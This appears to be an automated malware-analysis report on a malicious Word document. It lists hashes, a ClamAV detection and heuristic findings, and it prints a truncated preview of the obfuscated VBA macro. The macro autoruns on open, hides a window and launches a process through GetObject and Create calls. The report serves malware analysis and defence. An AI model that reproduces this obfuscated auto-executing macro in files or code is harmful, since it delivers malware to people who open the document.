Office (OLE) malware analysis — malicious · d58ca69e03c4f1e8

MALICIOUS

Office (OLE)

145.4 KB Created: 2019-03-20 14:48:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 98a4c1b347b307cd540b195c5e82a756 SHA-1: 3d09f3c2dfbc9c99c8ddd8cabf90bd0356ea17f3 SHA-256: d58ca69e03c4f1e840867f1f6c5a2a927164393698bfde6fbb4f1112e7dfd1d9

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine is present and uses a GetObject call, which is a common technique for downloading and executing secondary payloads. The ClamAV detection name 'Doc.Malware.Sagent-6902893-0' further confirms its malicious nature. The obfuscated nature of the VBA code prevents a more detailed analysis of the payload's specific actions.

Heuristics 7

ClamAV: Doc.Malware.Sagent-6902893-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Sagent-6902893-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16486 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	16486 bytes
SHA-256: `9422e2643a40545281110028a30699405aece8f8521c07ade1ddf373a3d02ac5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GQDAA4A" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "mGwAGQD" Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "hAAZAA" Sub autoopen() On Error Resume Next If mAAAcA = oCABAxA Then lAQA_AA = 360460939 * CInt(616932250) / _ 493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430) kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _ hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617)))) End If If OwAAGD4_ = pAADBB Then VAUDABAk = 712164150 * CInt(678201983) / _ 403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671) BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _ oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646)))) End If If loZ1AQ = nxXQBkAA Then rwXCUQ = 959896255 * CInt(130090308) / _ 129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504) zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _ ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821)))) End If Set v_BGcG = GetObject(mGwAGQD.RGAADA) If jBxAoCUD = c4AAoDZX Then qkADAAwA = 135865924 * CInt(496703309) / _ 59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530) HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _ okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635)))) End If If jAooQAA = T4AA4B Then ZDAUUAx = 8602144 * CInt(576647515) / _ 85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055) KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _ JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630)))) End If If jQQwoA = LQxBAQB Then oAQAU4QD = 443932658 * CInt(795783673) / _ 756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702) RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _ tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972)))) End If v_BGcG.ShowWindow = 77530 - 77530 If jAAoAx = lAA1AXGA Then OBkACAX = 269266117 * CInt(715040411) / _ 842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008) aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _ aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610)))) End If If u1AAcA = nBB_UA Then k4UAABAQ = 85219461 * CInt(204448542) / _ 239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860) zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _ JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387)))) End If If pXUXABkQ = pDGXcw4 Then SZQAcAGB = 459707733 * CInt(94268094) / _ 280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759) QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _ vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763)))) End If GetObject(mGwAGQD.Gcw1A_AC). _ Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA If sABo4Q = dC4UD1A Then cBAGAAAk = 232633544 * CInt(118776403) / _ 506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283) f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _ lAB_wDUQ / F ... (truncated)

SHA-256: 9422e2643a40545281110028a30699405aece8f8521c07ade1ddf373a3d02ac5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GQDAA4A"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "mGwAGQD"
Attribute VB_Base = "0{A3231994-0405-462A-A1C2-8FF3BF66FF47}{A302F022-DC64-47CA-B2F5-9FDFF06F53D7}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "hAAZAA"
Sub autoopen()
On Error Resume Next
   If mAAAcA = oCABAxA Then
      lAQA_AA = 360460939 * CInt(616932250) / _
493785898 + Sqr(458583148) * 728298510 / CInt(931328294) * (650238058 * 551928430)
      kcDZ4UQ = (93967997 - Asc(wQAcBB) / BABAD1A / 367112517 + _
hB1Zk41A / Fix(657703886 + Log(FAABBX * Sgn(583937233) + toUAZUD / CSng(427730617))))
End If
   If OwAAGD4_ = pAADBB Then
      VAUDABAk = 712164150 * CInt(678201983) / _
403439880 + Sqr(608737942) * 346981986 / CInt(887036070) * (31494867 * 189248671)
      BDZGDAxB = (51313011 - Asc(SxxAAB) / vAAUBA / 938327368 + _
oAQADo / Fix(547418284 + Log(mAAAAQ * Sgn(602746105) + jDoA1_A / CSng(108804646))))
End If
   If loZ1AQ = nxXQBkAA Then
      rwXCUQ = 959896255 * CInt(130090308) / _
129873245 + Sqr(724149820) * 455445265 / CInt(707421804) * (458249446 * 249045504)
      zU_1AB = (890124428 - Asc(cUUoDD4) / JACQXUD / 790973879 + _
ZABCcGkQ / Fix(714023240 + Log(AAQDAD * Sgn(258489203) + SBkxAAAw / CSng(526080821))))
End If
Set v_BGcG = GetObject(mGwAGQD.RGAADA)
   If jBxAoCUD = c4AAoDZX Then
      qkADAAwA = 135865924 * CInt(496703309) / _
59940355 + Sqr(979082682) * 820981873 / CInt(149309126) * (563785917 * 364391530)
      HDBoDDQ = (607898886 - Asc(WA1BXG) / MCAAU1C / 725977624 + _
okwZwBA / Fix(429506819 + Log(Cc1kAAxA * Sgn(194570980) + HcAko1oG / CSng(290826635))))
End If
   If jAooQAA = T4AA4B Then
      ZDAUUAx = 8602144 * CInt(576647515) / _
85589341 + Sqr(516300873) * 879881470 / CInt(857882346) * (196164702 * 789476055)
      KAAAAXAx = (13419597 - Asc(wQwAQ1) / NBA4BowA / 289888408 + _
JAAAUko / Fix(904064640 + Log(QGU_ADAo * Sgn(871851531) + wDAc1kB / CSng(773913630))))
End If
   If jQQwoA = LQxBAQB Then
      oAQAU4QD = 443932658 * CInt(795783673) / _
756604422 + Sqr(927126228) * 716537682 / CInt(886780290) * (972002796 * 653697702)
      RQQBQxX = (523253843 - Asc(iXo_AAxw) / MAxk_A / 244604452 + _
tAAAAwG / Fix(312501987 + Log(mAoQUA * Sgn(253004511) + GABAcA / CSng(128409972))))
End If
v_BGcG.ShowWindow = 77530 - 77530
   If jAAoAx = lAA1AXGA Then
      OBkACAX = 269266117 * CInt(715040411) / _
842971776 + Sqr(751485346) * 212281959 / CInt(754140829) * (533957089 * 796873008)
      aAXA_UxA = (137014469 - Asc(KQAZAA) / KDwAGQ / 318548519 + _
aAQZQA / Fix(152383850 + Log(zAAkcA1 * Sgn(201328988) + FwQCAB / CSng(317166610))))
End If
   If u1AAcA = nBB_UA Then
      k4UAABAQ = 85219461 * CInt(204448542) / _
239211574 + Sqr(390941598) * 839005007 / CInt(74740253) * (911348423 * 418700860)
      zAcGGADX = (77693527 - Asc(vQA1DA) / UCAB1A / 795536785 + _
JGAAZUQ / Fix(117999692 + Log(z__cZA * Sgn(651591479) + WDQAD1B / CSng(738625387))))
End If
   If pXUXABkQ = pDGXcw4 Then
      SZQAcAGB = 459707733 * CInt(94268094) / _
280763892 + Sqr(556862412) * 850561241 / CInt(699526922) * (262996421 * 234784759)
      QAkxDC = (420550504 - Asc(coxAADk) / OQAoUc / 666531387 + _
vCGACAA / Fix(272745002 + Log(RABxDAkc * Sgn(446761763) + XUQxCA / CSng(453161763))))
End If
GetObject(mGwAGQD.Gcw1A_AC). _
Create# RoAoxUAC + mGwAGQD.B4QAXA + BXAU4GCc + mGwAGQD.GZAAAA + jAkAUAA + mGwAGQD.JBQAoABG + wckQkUDx, EQUQAUAZ, v_BGcG, hAAAXDAA
   If sABo4Q = dC4UD1A Then
      cBAGAAAk = 232633544 * CInt(118776403) / _
506359801 + Sqr(108038854) * 715836710 / CInt(151988754) * (880926149 * 381311283)
      f1Ax1BAA = (288996547 - Asc(tQA4UAo) / qkAADGo / 460044872 + _
lAB_wDUQ / F
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.